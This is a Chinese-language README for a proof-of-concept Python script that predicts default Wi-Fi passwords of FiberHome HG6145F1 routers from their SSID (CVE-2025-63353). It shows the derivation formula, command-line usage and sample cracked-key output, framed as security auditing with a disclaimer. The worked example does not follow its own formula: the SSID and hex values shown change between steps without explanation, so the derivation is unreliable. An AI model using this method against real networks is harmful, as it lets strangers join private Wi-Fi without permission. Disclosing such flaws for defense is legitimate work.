一个用于安全审计和概念验证演示的 Python 工具,针对 FiberHome HG6145F1 (RP4423) 路由器中发现的确定性密码生成缺陷。
该脚本利用 CVE-2025-63353,这是一个严重漏洞,其中出厂默认的 WPA/WPA2 预共享密钥由广播的 SSID 数学推导而来。攻击者只需观察网络名称 (SSID),即可在无需任何用户交互的情况下计算出默认密码。 漏洞逻辑: 路由器使用一个确定性公式:HEX_A(来自 SSID)+ HEX_B(来自密码)= 0xFFFFFF。
FiberHome 设备被全球新兴市场的各大互联网服务提供商(ISP)广泛部署。该脚本对具有以下默认命名规则的设备尤为有效:
该脚本使用 argparse 处理命令行输入。
python predictor.py fh_96C3A0
[+] Predicted Password: wlan693c5f
使用 -v 标志查看底层的十六进制减法运算。
python predictor.py fh_96C3A0 -v
[*] Input HEX_A: 0x669EA0
[*] Calculation: 0xFFFFFF - 0x669EA0 = 0x99615F
[+] Predicted Password: wlan693c5f
如果您的路由器受影响,您的网络在您采取措施之前是不安全的:
此信息仅供授权安全测试、网络管理和教育目的使用。